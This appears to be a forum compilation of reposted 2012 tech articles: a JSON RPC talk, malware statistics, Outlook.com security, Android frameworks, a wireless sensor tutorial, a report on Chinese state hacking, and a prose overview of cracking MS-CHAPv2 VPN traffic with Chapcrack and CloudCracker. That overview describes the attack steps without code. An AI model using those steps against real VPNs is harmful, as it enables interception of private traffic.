Nytro

JSON RPC JSON RPC is a recently fashionable buzzword in the AJAX context. This lecture explains its principles, specifically the same origin policy for cross site scripting and its relation to JSON RPC, and demonstrates the essential implementation details using the example of the geocoding service in the google maps API. The collection of technologies on which modern web applications are based is nowadays summarily referred to as AJAX, or "Asynchronous JavaScript and XML". Interestingly, the use of XML as the data format for the transfer between client and server is not only unnecessarily complicated, but in its usual incarnation as XMLHttpRequest it is also subject to restrictions that prevent the direct use of web services from the client side of the web application. A natural alternative to the transport of XML data structures though the XMLHttpRequest API is the transport of literal JavaScript expressions (nowadays also called JSON, or "JavaScript Object Notation") through dynamically created SCRIPT elements. We discuss practical aspects of the implementation of this approach and the consequences for architecture and software design of web applications. Because the circumvention of restrictions that were originally meant to maintain security might be frightening at first sight, we recapitulate the principles on which cross site scripting restrictions are based, and we discuss why their circumvention for the purpose of JSON/SCRIPT based data transport doesn't infract the security of a web application. [TABLE=class: datatable] [TR] [TD=class: highlight]Authors[/TD] [TD=class: lowlight] Steffen Meschkat [/TD] [/TR] [TR] [TD=class: highlight]Submitted[/TD] [TD=class: lowlight]August 05, 2012[/TD] [/TR] [/TABLE] Audio: IT Security and Hacking knowledge base - SecDocs Slides: IT Security and Hacking knowledge base - SecDocs [TABLE=class: datatable] [TR] [TD=class: highlight]Source[/TD] [TD=class: lowlight]23C3-1568-en-json_rpc.m4v[/TD] [/TR] [TR] [TD=class: highlight]Size[/TD] [TD=class: lowlight]88.7 MB[/TD] [/TR] [/TABLE] Download: http://dewy.fem.tu-ilmenau.de/CCC/23C3/video/23C3-1568-en-json_rpc.m4v Sursa: IT Security and Hacking knowledge base - SecDocs

[h=2][infographic] Where Malware Comes From[/h] Dan Rowinski· August 2nd, 2012 Malware is a worldwide problem. If there is electricity, an Internet connection and a computer, there will be viruses, worms, Trojans and other sneaky programs trying to gain access to your computer. Where do these nasty creatures come from? A large percentage of the world’s malware comes from China. According to AlienVault’s Open Threat Exchange platform, China is the capital of malicious Internet addresses, based on 95,249 addresses analyzed. The United States comes in second with 60,346, well ahead of the third, fourth and fifth malware vectors: South Korea (16,115), Russia (13,367) and Taiwan (12,504). How is this malware being delivered? The average virus wants to find its way into computers. Direct injection (where a virus is not hidden in a different type of file) is fairly rare. Far more commonly, malware hitches a ride on an otherwise benign file. This is the reason why security programs scan all files downloaded to a computer. The top malware-infested file type is .exe, the most common file type for a Windows program. The second most common carrier is HTML content, which can be found on almost any Web site as well as in emails. Zip and RAR files, which bundle together other file types, are the third most common, while Adobe PDF and Flash files are also prevalent malware delivery vehicles. The top types of viruses are all associated with Windows. While Mac malware exists and is becoming more prevalent, the amount of Windows malware on the Internet is nothing short of stunning. The top five malware content types found by the AlienVault community are all derivations of Windows viruses. Since February, the AlienVault Open Threat Exchange has analyzed over 5 million suspicious URLs. That is a drop in the bucket in comparison to the billions of sites on the Internet, but a large enough sample to provide a sense of how much malware is present on the Web. The company received nearly 30 million entries from its users and found a little more than a million malicious addresses. See the infographic below for more details. The data was aggregated from AlienVault’s Open Threat Exchange from Feb. 20 to July 20, 2012. The data comes from the company’s customers as well as its Open Source Security Information Management (OSSIM), an open-source security information event-management platform. Sursa: [infographic] Where Malware Comes From

[h=1]A quick look at security features on Microsoft's new Outlook.com email service[/h]Posted on Sun, 05 Aug 2012 10:45 am EDT by Rich Edmonds With the launch of Microsoft's Outlook.com, many have been questioning security features of the new email service. The most dominant topic is the limit of 16 characters for passwords. This is a limitation that was also present in Hotmail / Live and has been brought forward into its successor (due to Microsoft's login system). We'll take a look at this issue as well as a quick overview of additional security measures Microsoft has implemented to keep your emails safe. Password character limitations A counter question would be do you honestly need more than 16 characters? It's an argument that could span a number of pages in a forum thread or accumulate a hundred or so comments on this article. One side could -- of course -- argue that using as many characters as possible is more secure due to the creation of more possible combinations. On the other hand, the password "123456789101112131415" is less secure than "3%84Dji8u&L8D", so it's more about how consumers create their account passwords. Using a random generator (or simply having some fun with random combinations in Notepad if you have the time) is always recommended - of course you should always note down what you've decided on. It's amusing to hear / read about company security holes due to employee passwords, "Admin" being the best example. It's certainly not rocket science. Microsoft has responded to concerns about the 16 character limit, should you be interested to read an official response: "We are working on increasing this. Unfortunately, for historical reasons, the password validation logic is decentralized across different products, so it's a bigger change than it should be and takes longer to get to market. It's also worth noting that the vast majority of compromised accounts are through malware and phishing. The small fraction of brute force is primarily common passwords like '123456' not due to a lack of complexity." That being said, we can't see an issue with the 16 character limitation. It shouldn't worry consumers when using the service. LinkedIn is a superb example of how security can go horribly wrong. Check out the following Rapid7 infographic (click for larger version) on the most popular passwords that were reportedly already cracked prior to the account passwords being stolen. You'll be surprised by what made the list. While we can understand the concern for the limitation and that those who are security obsessive would prefer to have a high amount of characters in passwords, it's not the end of the world should you ensure they're randomly generated with a sufficient combination of alphanumeric (and special) characters. Single-use codes for masking account credentials Microsoft has also implemented single-use codes for logging into Outlook.com when on a public computer or other devices where the user may be at risk of having their passwords detected. The single-use code enables Microsoft to text a passcode to the user's mobile phone (email and phone number required when attempting to login), which negates the need for the account password. The single-use code (as the name implies) can only be used once and is invalid once the user has successfully logged in. It's good to have extra protection in place for Outlook.com users to be able to access their email on computers / devices in public places. Two-factor authentication and no targeted advertising One of the major reasons Microsoft provides to attract Gmail users is the company will not be reading emails to provide targeted and relevant advertising using its network of publishers - remember the Gmail man? This ensures user data is kept private. While advertising is present on main folder view pages, its in the form of general adverts that will be displayed to everyone. Microsoft has also responded to a question on Reddit inquiring about two-factor authentication in its global login system: "Over the last 6 months we have rolled out two-factor authentication in several systems that use Microsoft account. For example, you need to use two-factor auth to buy stuff on xbox.com, to remotely fetch files from other computers on SkyDrive and more. We are learning a lot from this and have more in the works. We see two-factor auth as being an increasingly important piece of our protection suite." What we can all take away from this is that Microsoft is working hard on further tightening security in its products and backend services. We can expect to see more information and updates applied to enhance protection already implemented. All-in-all, rather good stuff. Let us know your thoughts in the comments, do you believe Microsoft is doing enough to secure your data in the cloud? Sursa: A quick look at security features on Microsoft's new Outlook.com email service | wpcentral | Windows Phone News, Forums, and Reviews

[h=2]Top 15 Android-Ready Application Development Frameworks [/h]Wednesday, 01 August 2012 07:33 Eric Brown On July 20, Adobe unveiled version 2.0 of the open source PhoneGap, a leader among the growing crowd of cross-platform, Android-compatible, mobile app frameworks. Open source developers welcomed new PhoneGap features such as a "Cordova WebView" function that enables developers to integrate code into larger native applications. There are scores of such frameworks to choose from these days, and as seen in our Top 15 list below, the best are getting quite sophisticated. Yet there is still considerable grumbling about the state of mobile cross-platform frameworks. They may be fine for the majority of Android apps being developed, yet few seem to be capable of handling all the requirements of a professional-quality enterprise or consumer app. If you're familiar with Java and Eclipse, and Android is initially the sole destination, Google's Android SDK and related Android Development Tools (ADT) Eclipse plugin are probably the better choices. The problem is that most app publishers prefer to start with iOS, or else ship on iOS and Android simultaneously, with perhaps a BlackBerry or Windows Phone version as well. Others lack the experience to go native. Nevertheless, the official tools deserve a look, as it's usually difficult to port one's cross-platform effort to the Android SDK in mid-stream. So we'll start with Google's tools first before moving on to the multi-platform frameworks. [h=2]Google's Tools Get Friendlier[/h] Earlier this month, Google released Revision 20 of the SDK and ADT in conjunction with Android 4.1 ("Jelly Bean"), adding new debugging tools, application templates, and performance tweaks. Other Google tools include a native development kit (NDK) for hardware optimization and the Android Accessory gadget control application development kit (ADK). Android now offers an arguably superior platform to iOS. It provides much more flexibility, better app testing, and easier app approvals. Yet when it comes to overall ease of use, Apple may still have the edge. Although Android uses an easier, more widely known language in Java, Android's rich feature set and multitasking features are harder to master, and version- and device fragmentation can slow things down considerably. There are no easy fixes for these problems, but Google has at least worked hard to reduce the learning curve. Last month it revamped its Android Developers website to make it more accessible, following up on its previous launch of an Android training program and the publication of a style guide. [h=2]Cross-Platform Frameworks Duke it Out[/h] According to the Eclipse Open Source Developer Report 2012, 60 percent of open source developers writing Android or iOS apps use only the official SDK. Among those who use cross-platform frameworks, the choices, ranked from first to last were: - jQuery Mobile (28.6 percent) - PhoneGap (17.9) - Sencha Touch (7.9) - Dojo Mobile (4.9) - Titanium (2.8). These multi-platform options are typically open source JavaScript frameworks with support for HTML5 and CSS. Aimed primarily at web developers, they are often used for migrating website content to app form. The frameworks support Android and iOS at a minimum, and often target BlackBerry, Windows Phone, and Symbian. Although they typically come with a "write once, run anywhere" promise, the amount of tweaking required for each version can still be considerable, and optimization of memory, battery life, and performance is often limited. Most of the frameworks offer drag-and-drop GUI design tools, and many incorporate APIs aimed at exploiting specific components like audio and GPS. Quite a few are built on the Model View Controller (MVC) UI and component interaction model. [h=2]Platforms for Coding Beyond JavaScript[/h] While PhoneGap and most of the leading frameworks are web-oriented HTML5/JavaScript apps that can tap native functions, some, like Appcelerator's Titanium, generate native Java code. While this approach has potential performance advantages, it tends to limit code reusability. Some frameworks specialize in programming environments beyond JavaScript. For example: - RhoMobile is designed for Ruby developers. - MoSync is aimed at C++ hackers. - C#-flavored Mono for Android appeals to enterprise-focused developers familiar with Visual Studio. Game developers, meanwhile, tend to use gaming-focused frameworks that offer specialized level-creation features, game engines, and 3D animation support: - Corona SDK (the main player here) - Flixel - Unity3D. Educational organizations and others with limited needs and limited resources can turn to codeless, cross-platform app-building environments like TheAppBuilder. Google abandoned its own codeless App Inventor, but it was recently re-launched by MIT as the MIT App Inventor. [h=2]Other Android-Ready Options[/h] On the opposite extreme, those aiming to develop complex applications, often in conjunction with new hardware, may prefer the robust, commercial Android-compatible platforms from embedded Linux OS vendors like Wind River, MontaVista, and Mentor Graphics. These are especially useful when targeting form factors beyond smartphone and tablets. The Wind River Platform for Android run-time environment includes an optimized Android SDK, middleware, device drivers, and testing suites, as well as vertical market accelerators. Those looking to optimize their apps for particular processors can also find Android-ready tools from major ARM semiconductor vendors like Texas Instruments and Freescale, as well as ARM itself. Open source development board projects offer similar tools. MIPS and Intel, meanwhile, are building Android tools to support their own respective architectures. Other Android-ready tools focus on particular steps in the development process. These include: - Testing (Testroid, Appthwack) - Performance management (Crittercism NDK) - GUI design (DroidDraw, SPB UI Builder). The latter category includes GUI tools from Motorola, HTC, and Samsung, designed for their respective UI skins. Finally, new cloud-oriented tools such as OpenMobster and Cumulus provide sync and other cloud support for Android apps. [h=2]15 Android-Ready Development Frameworks[/h] The following are 15 of the more popular Android development tools. Unless otherwise noted, they are open source, cross-platform frameworks: Basic4android: Anywhere Software's commercial RAD tool and IDE for Android provides a comprehensive feature set and an object-oriented programming language similar to Visual Basic. Basic4android (Basic for Android) - Android programming with Gui designer Corona SDK: Widely used among game developers, Corona is also a popular, general-purpose framework. Corona Labs (formerly Ansca Mobile) claims an installed base of 120,000 developers. This high-end, commercial SDK offers over 500 APIs, as well as advertising and native UI support, and a built-in physics engine. The Leader in Cross Platform Mobile App Development DHTMLX Touch: This JavaScript and AJAX library focuses on UI widgets, and is aimed at building HTML5-based apps. DHTMLX Touch - JavaScript Mobile Framework for Building HTML5 Web Apps Dojo Mobile: The Dojo community's BSD-licensed HTML5/JavaScript framework has added MVC and app-controller packages, as well as mobile-specific components such as switches and sliders. A degree of PhoneGap compatibility is also available. Dojo Mobile - The Dojo Toolkit iUI: This lightweight web UI framework includes a JavaScript library, CSS support, and development images. iUI - Mobile web framework for high-end devices jQuery Mobile: This popular, lightweight HTML5-based framework is built on jQuery, and focuses on semantic markup, progressive enhancement, and themable design. It's the leading cross-platform framework among Eclipse open source developers. jQuery Mobile | jQuery Mobile Kendo UI: Telerik's HTML5/JavaScript framework is available in open source and commercial versions. Kendo UI offers a wide selection of UI widgets and plugins, and provides an MVVM framework, performance optimization, and validation and internationalization features. Kendo UI - The Art of Web Development Mono for Android: Xamarin's C#- and enterprise-oriented package is compatible with a similar iOS-based MonoTouch version, and can also share code with the C#-based Windows Phone. Mono supplies an environment conducive to Visual Basic developers, and is touted for its debugger and native binary compiler. Xamarin MoSync SDK: MoSync supports C++, HTML5/JavaScript, or both on up to nine different platforms. The SDK is touted as being compatible with PhoneGap, as well MoSync's own new HTML5/JavaScript-based native mobile app developer/simulator, MoSync Reload. Create iPhone and Android apps with JavaScript and C++ | cross-platform mobile application development PhoneGap: Designed for JavaScript, HTML5, and CSS development, PhoneGap is now sponsored by Adobe and the Apache Foundation. The 2.0 version adds Windows Phone support, new CLI functions, and overhauled JavaScript libraries. It also debuts Cordova WebView, an embeddable HTML rendering control that uses Apache's Cordova-JS API for tasks such as integrating PhoneGap code into larger native apps. PhoneGap | Home RhoMobile Suite: Motorola's mature, business-oriented framework features RhoConnect, RhoStudio, RhoElements, and a new RhoHub used for cloud app-building. RhoMobile is built on the Ruby language, the Rails Frameworks, and the MVC model. RhoMobile Suite - Motorola Solutions USA Sencha Touch 2: Sencha's popular HTML5/JavaScript framework provides 50 built-in components, state management, and an integrated MVC system. It now offers a free native packager that streamlines distribution to stores like Google Play. http://www.sencha.com/products/touch/ SproutCore: This HTML5-driven framework offers a "clean" MVC architecture, and emphasizes performance optimization and scalability. SproutCore TheAppBuilder: JamPot's new HTML5-based native app-building app has received plenty of buzz. It features a codeless, drag-and-drop interface that lets users quickly build fairly rudimentary apps by filling in Q&A checklists. Highlights include extensive social networking integration and automated submissions to Google Play. TheAppBuilder Titanium: Appcelerator claims its Android/iOS framework supports over 5,000 device and mobile-OS APIs. Unlike the more web-oriented frameworks, Titanium uses JavaScript to create native code, with claimed benefits in performance. Titanium SDK | Appcelerator Additional Android-compatible development options include Andromo, Application Craft, Hypernext Android Creator (HAC), Jo, jQTouch, MIT App Inventor, Togosoft Device Browser, Unity Mobile, WebApp.Net, Wink Toolkit, xUI, and Zepto.js. For more options, check out these roundups of Android development software from BuildMobile, Daily Tekk, MobiGeni, and Technology Trend Analysis. Meanwhile, post your own favorites in the comments section below. Sursa: https://www.linux.com/news/embedded-mobile/mobile-linux/612366-15-android-ready-application-development-frameworks-

[h=1]Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) [/h] Dorji Applied Technology is a China-based company that primarily focuses on building different types of RF modules that can be easily incorporated in designing wireless data loggers, sensor network, telemetry and other wireless applications. Their products mostly use RF transceiver chips from ADI, Infineon, and Silicon Labs. Some of their RF modules have an additional preprogrammed microcontroller that allows direct interface of selected analog and digital sensors to the module. This means you don’t need any external MCU or to write codes for these sensors. I have been playing with their DRF5150S and DRF4432S RF modules for past couple weeks and I should admit that they are very versatile and easy to use. In this blog post, I will describe these two modules briefly, and illustrate how to put them together to construct a simple wireless sensor application where data from a remote sensor are received and displayed on a PC, without using any external microcontrollers. Dorji's DRF5150S wireless sensor module DRF5150S transmitter module DRF5150S is a 433 MHZ ISM band transmitter module based on Infineon’s TDA5150 device, which is a low power, multiband, multichannel ASK/FSK/GFSK RF transmitter chip for the sub 1GHz ISM bands (300-320 MHz, 425-450 MHz, 863 – 928 MHz) and with RF-output power of up to +10 dBm. The DRF5150S module has also got an ultra-low power STM8L151 microcontroller on board that is preprogrammed to control the overall operation of the transmitter. The module operates from 2.1-3.6V. The power supply and input/output pins are brought out to 0.1? male header pins to make prototyping easier. The module can be configured to operate in one of the following two modes: 1. Data transmission mode In data transmission mode the DRF5150S module acts as a normal data transmitter. It receives data from a host MCU through a standard UART serial port and then sends them out to RF receiving module. The receiving RF module that can be used with DRF5150S is DRF4432S. We will talk about that later. The DRF5150S also features sleep mode during which no data is transmitted and the module consumes only 1.5µA of current. 2. Sensor data mode The preprogrammed STM8L151 microcontroller on board allows you to connect selected digital and analog sensors directly to the DRF5150S module, which is a very nice feature of it. In this mode, the DRF5150S transmits the sensor data continuously at a preset interval along with its ID and the battery voltage information. The ID is useful to identify the source of transmission when there is more than one DRF5150S modules transmitting. The ID is divided into two parts: Group ID and Slave ID. The Group ID of the receiving module (DRF4432S) should match with the Group ID of the transmitting module otherwise the receiver will ignore the transmitted data. However, multiple DRF5150S modules can share the same Group ID, but they should have different Slave ID’s for identification on the receiving end. The module provides a 12-bit ADC channel that allows you to connect analog sensors, such as PT1000, LM34, LM35, TMP35, etc. It also features direct interfacing capability for DS18B20, SHT1X, and SHT2X digital sensors. The following picture shows the DRF5150S module and its pin configurations. The RXD and TXD are UART receive and transmit lines. They do have alternative functions based on the mode of operation. DRF5150S pins Configuration tool As I mentioned earlier, the DRF5150S provides multiple modes of operation. The module can be configured for a particular mode using a PC software, DRF Tool, downloadable from the Dorji’s website. The DRF Tool is a Windows based GUI application that communicates with the DRF5150S module connected to the PC through an USB-UART adapter. The TXD, RXD, VCC, and GND pins of the DRF5150S module should be connected to the corresponding pins of the USB-UART module. Note that the VCC voltage should be 3-3.6V. Here is a snapshot of the DRF Tool. All supported modes can be seen through the Sensor Type drop-down menu, and you pick one that you want to configure your DRF5150S module to. There are lot of other things that you can do with this tool, such as setting the TX interval, RF frequency and data rate, sensor ID, etc. DRF Tool for configuring 5150S module For illustrative purpose we will configure the transmitter module to DS18B20 High Resolution Mode. In this mode, a DS18B20 sensor can be directly interfaced to the DRF5150S module for measuring temperature with high resolution (12-bit). So we will select DS18B20 (High Resolution Mode) from the sensor type drop-down menu and set the transmitting interval to 2 seconds. Rest of the parameters are set as shown above. Now, we click on Write W button to send these configuration settings to the DRF5150S module connected to the PC. The STM8L151 microcontroller on board receives this information and saves into its internal EEPROM. The DRF5150S module is now configured for interfacing the DS18B20 temperature sensor. You should connect the sensor to the RF module as shown below. Connecting a DS18B20 sensor to DRF5150S RF module DRF5150S RF transmitter and DS18B20 sensor setup on breadboard I have made this setup on a breadboard and powered the circuit with a coin cell 3V battery (see the picture above). The DRF5150S reads 12-bit temperature data from the DS18B20 sensor and transmit it (with 2 seconds interval) at 50KBPS data rate using 434 MHz GFSK modulation. The transmitted data format of the DRF5150S is, ID bytes (Group+Slave) + Data + BAT The Group and Slave IDs are 1 byte each. The Data is 2 byte long for DS18B20 sensor. The last byte (BAT) contains the information of the battery strength. You can calculate the battery voltage from BAT as, Battery voltage = (BAT+200)/100 Altogether 5 bytes are transmitted for each temperature sample. Now lets look at the DRF4432S module which is a matching receiver for the DRF5150S transmitter. In order to make this pair to work together, they must be configured identically. Dorji’s DRF4432S receiver module The DRF4432S is a GFSK receiver module based on Silicon Laboratories’ Si4432 wireless ISM transceiver chip. This module is used together with DRF5150S to build wireless sensor applications. It receives data from the DRF5150S transmitter module and transfers it through an UART serial interface. The picture below shows the pin diagrams of the DRF4432S module. Please refer the datasheet to find more details about these pins and their functions. DRF4432S pins The DRF4432S module must be configured in the same working mode as its complementary DRF5150S module. The configuration of the DRF4432S is done in the similar way using the DRF Tool. Again you need to connect the DRF4432S to the PC using an USB-UART adapter. Make sure you chose the same parameters in the DRF Tool for the receiver as you did for the transmitter. For our test application, the DRF4432S receiver module is also configured to DS18B20 High Resolution Mode, with RF frequency 434 MHz, RF data rate 50KBPS, and TX interval 2 sec. The transmitting and receiving modules can be configured to operate in a different frequency channel with 200 KHz spacing. DRF4432S is configured similarly as DRF5150S We now interface the DRF4432S to the PC through the USB-UART adapter so that the received data bytes can be transferred to the PC. A PC application is developed using Processing language, which receives the data and displays them on screen. The Enable (EN) pin of the DRF4432S must be pulled low in order for it to work. If the EN pin is pulled high, the receiver goes in to sleep mode. Since the DRF4432S has got an on-board 3.3V regulator, it can operate from 3.4V to 5.5V. DRF4432S is connected to PC using an USB-UART adapter DRF4432S and USB-UART connection The output data format of the DRF4432S receiver is ID (group ID + slave ID) +Data + Bat + RSSI It is same as that of the transmitter module except there is an additional byte (RSSI) which gives the field strength of received signal. The higher value of RSSI means more reliable wireless link. The product datasheet says if RSSI < 64 at 50Kbps RF data rate, then the field strength is considered weak and the probability of package loss is high. N Processing application The following Processing code is written to receive six bytes of data from the DRF4432S receiving module connected to the PC through an USB-UART interface. Information like temperature of the remote station as sent by the DRF5150S module, slave ID of the remote transmitting module, the battery voltage on the transmitting side, and the strength of the RF link between the transmitter and the receiver are extracted and displayed on the computer screen. /* Project: Wireless sensor application using DRF5150S and DRf4432S Written by: Rajendra Bhatt (www.embedded-lab.com) Date: 2012/08/2 */ //import Serial communication library import processing.serial.*; // Variable declaration PFont font22, font44, font14; PFont font12; float tempC; float tempF; float y, h, BattV,Slave_ID, Byte1, Byte2, Byte3, Byte4, Byte5, Byte6, RSSI; Serial USB_UART; int i, j, xx=-15; void setup() { // Define size of window size(350, 350); //setup fonts for use throughout the application font22 = loadFont("MicrosoftYaHei-22.vlw"); font12 = loadFont("MicrosoftYaHei-12.vlw"); font44 = loadFont("FranklinGothic-Demi-32.vlw"); font14 = loadFont("TimesNewRomanPS-BoldMT-16.vlw"); //init serial communication port USB_UART = new Serial(this, "COM6", 9600); } void draw() { while (USB_UART.available() > 0) { Byte1 = USB_UART.read(); delay(20); Byte2 = USB_UART.read(); delay(20); Byte3 = USB_UART.read(); delay(20); Byte4 = USB_UART.read(); delay(20); Byte5 = USB_UART.read(); delay(20); Byte6 = USB_UART.read(); background(250, 250, 250); // Light blue color fill(200, 6, 0); smooth(); stroke(0); strokeWeight(2); ellipse(100, 280, 58, 50); noStroke(); fill(0, 46, 200); arc(100, 60, 30, 20, PI, PI+PI); rect(85,60,30,200); fill(250,250, 250); rect(95,60,10,200); // Marks on thermometer stroke(0); strokeWeight(1); textAlign(RIGHT); fill(0,46,250); for (int i = 0; i < 5; i += 1) { line(70, 230-40*i, 80, 230-40*i); if(i < 4) line(75, 210-40*i, 80, 210-40*i); textFont(font12); text(str(40+20*i), 65, 235-40*i); } textAlign(LEFT); for (int i = 0; i < 6; i += 1) { line(118, 242-35*i, 128, 242-35*i); if(i < 5) line(118, 225-35*i, 123, 225-35*i); textFont(font12); text(str(0+10*i), 135, 247-35*i); } noStroke(); fill(0,46,250); textFont(font22); textAlign(LEFT); text("F", 57, 46); text("C", 135, 46); textFont(font12); text("o", 45, 35); text("o", 125, 35); fill(250,90,0); textFont(font22); text("o", 300+xx, 45); text("o", 300+xx, 85); // DS18B20 conversion tempC = Byte4*256+Byte3; tempC = tempC/16; BattV = (Byte5+200)/100; Slave_ID = Byte2; tempF = ((tempC*9)/5) + 32; textFont(font44); RSSI = Byte6; text(nfc(tempC, 2), 200+xx, 60); text(nfc(tempF, 2), 200+xx, 100); text("C", 320+xx, 60); text("F", 320+xx, 100); textFont(font14); text("Battery Voltage = V", 190+xx, 140); text(nfc(BattV, 2), 313+xx, 140); text("Signal Strength = ", 190+xx, 160); text(nfc(RSSI,0), 313+xx, 160); text("Slave ID = ", 190+xx, 180); text(nfc(Slave_ID,0), 313+xx, 180); // Raise mercury level fill(200,0, 0); y = -2.0*tempF + 310; h = 270-y; rect(95, y, 10, h); } } Download Processing source code and executables for different platforms (Windows, Linux, MacOS) Output I tested the setup by putting the DRF5150S sensor transmitter module in the front door porch of my house and the receiver module is connected to the PC in my spare bedroom on the second floor. The distance between the two is around 70 feet no line-of-sight. The received signal strength is found to be 179 (out of 255), which is really good. Wireless sensor transmitter on my front door porch Data received by DRF4432S module are displayed on the computer screen Summary DRF5150S and DRF4432S are two complimentary GFSK RF transmitter and receiver modules working in 433 MHz ISM band and are manufactured by Dorji Applied Technology. The presence of a pre-programmed microcontroller on board allows to connect selected analog and digital sensors directly to the DRF5150S module, which collects data from the sensor and sends out to the DRF4432S module at a configurable interval. The transmitter and the receiver can be both configured to operate for a particular sensor type through a PC software. For illustrative purpose, we constructed a very simple wireless sensor application where the DRF5150S module read 12-bit temperature data from a DS18B20 sensor and transmitted it continuously at an interval of 2 seconds. The DRF4432S receiver successfully received the temperature, ID, and Battery strength bytes sent by the DRF5150S module and transferred the data to a PC through an USB-UART interface. A Processing application was developed to display the received data on computer screen. More features and applications of these two RF modules will be explored in the second part of this tutorial. So stay tuned! Sursa: Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) :Embedded Lab

[h=2]Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic[/h] For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview: 1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted. 2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers should immediately start migrating to something else. That is all, have a nice day… Wait a minute, “PPTP traffic should be considered unencrypted,” what??? A recently released article by Moxie explains in detail how they are able to crack MS-CHAPv2 communication, used in many PPTP based VPNs with a 100% success rate. But that is not all, the protocol is also used in WPA2 enterprise environments for connecting to Radius authentication servers. Ouch… When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the web. Well, it looks like this may not be the case anymore. From Moxie’s article the weakness lays in the user password hash and three DES keys used in the encoding operation: “The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2128), we can incrementally brute force 7 bytes of it at a time.“ The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros: In doing so, this can significantly reduce the cracking time. Moxie created a tool called Chapcrack that will pull the necessary information from a network packet capture and cracks the third DES key. But this still leaves the first two DES keys, which could take a long time to crack. Unless, that is, you take the output from Chapcrack and upload it to CloudCracker. Cloudhacker is an online password cracking service that connects to a mean FPGA based box built by Pico Computing that they claim can crack any DES key within 24 hours: “They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.” So basically, if you can get a network packet capture, you can use Chapcrack to pull the DES key from it, and then pass it to CloudCracker to crack it within 24 hours. Then you can decrypt the entire network packet capture, or login to the users VPN or radius server. Nice… Looks like it is time to move on from MS-CHAPv2 based security products. Sursa: Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic

[h=1]Hackers Linked to China’s Army Seen From EU to D.C.[/h]By Michael Riley and Dune Lawrence - Jul 27, 2012 2:00 AM GMT+0300 The hackers clocked in at precisely 9:23 a.m. Brussels time on July 18 last year, and set to their task. In just 14 minutes of quick keyboard work, they scooped up the e-mails of the president of the European Union Council, Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the bailout for Greece, according to a computer record of the hackers’ activity. Over 10 days last July, the hackers returned to the council’s computers four times, accessing the internal communications of 11 of the EU’s economic, security and foreign affairs officials. The breach, unreported until now, potentially gave the intruders an unvarnished view of the financial crisis gripping Europe. And the spies were themselves being watched. Working together in secret, some 30 North American private security researchers were tracking one of the biggest and busiest hacking groups in China. Observed for years by U.S. intelligence, which dubbed it Byzantine Candor, the team of hackers also is known in security circles as the Comment group for its trademark of infiltrating computers using hidden webpage computer code known as “comments.” During almost two months of monitoring last year, the researchers say they were struck by the sheer scale of the hackers’ work as data bled from one victim after the next: from oilfield services leader Halliburton Co. (HAL) to Washington law firm Wiley Rein LLP; from a Canadian magistrate involved in a sensitive China extradition case to Kolkata-based tobacco and technology conglomerate ITC Ltd. (ITC) [h=2]Gathering Secrets[/h]The researchers identified 20 victims in all -- many of them organizations with secrets that could give China an edge as it strives to become the world’s largest economy. The targets included lawyers pursuing trade claims against the country’s exporters and an energy company preparing to drill in waters China claims as its own. “What the general public hears about -- stolen credit card numbers, somebody hacked LinkedIn (LNKD) -- that’s the tip of the iceberg, the unclassified stuff,” said Shawn Henry, former executive assistant director of the FBI in charge of the agency’s cyber division until leaving earlier this year. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.” Exploiting a hole in the hackers’ security, the researchers created a digital diary, logging the intruders’ every move as they crept into networks, shut off anti-virus systems, camouflaged themselves as system administrators and covered their tracks, making them almost immune to detection by their victims. [h=2]Every Move[/h]The minute-by-minute accounts spin a never-before told story of the workaday routines and relentless onslaught of a group so successful that a cyber unit within the Air Force’s Office of Special Investigations in San Antonio is dedicated to tracking it, according to a person familiar with the unit. Those logs -- a record of the hackers’ commands to their victims’ computers -- also reveal the highly organized effort behind a group that more than any other is believed to be at the spear point of the vast hacking industry in China. Byzantine Candor is linked to China’s military, the People’s Liberation Army, according to a 2008 diplomatic cable released by WikiLeaks. Two former intelligence officials verified the substance of the document. [h=2]Hackers and Spies[/h]The methods behind China-based looting of technology and data -- and most of the victims -- have remained for more than a decade in the murky world of hackers and spies, fully known in the U.S. only to a small community of investigators with classified clearances. “Until we can have this conversation in a transparent way, we are going to be hard pressed to solve the problem,” said Amit Yoran, former National Cyber Security Division director at the Department of Homeland Security. Yoran now works for RSA Security Inc., a Bedford, Massachusetts-based security company which was hacked by Chinese teams last year. “I’m just not sure America is ready for that,” he said. What started as assaults on military and defense contractors has widened into a rash of attacks from which no corporate entity is safe, say U.S. intelligence officials, who are raising the alarm in increasingly dire terms. In an essay in the Wall Street Journal July 19, President Barack Obama warned that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Ten days earlier, in a speech given in Washington, National Security Agency director Keith Alexander said cyber espionage constitutes “the greatest transfer of wealth in history,” and cited a figure of $1 trillion spent globally every year by companies trying to protect themselves. [h=2]Harvesting Secrets[/h]The networks of major oil companies have been harvested for seismic maps charting oil reserves; patent law firms for their clients’ trade secrets; and investment banks for market analysis that might impact the global ventures of state-owned companies, according to computer security experts who asked not to be named and declined to give more details. China’s foreign ministry in Beijing has previously dismissed allegations of state-sponsored cyberspying as baseless and said the government would crack down if incidents came to light. Contacted for this story, it did so again, referring to earlier ministry statements. Private researchers have identified 10 to 20 Chinese hacking groups but said they vary significantly in activity and size, according to government investigators and security firms. [h=2]Group Apart[/h]What sets the Comment group apart is the frenetic pace of its operations. The attacks documented last summer represent a fragment of the Comment group’s conquests, which stretch back at least to 2002, according to incident reports and interviews with investigators. 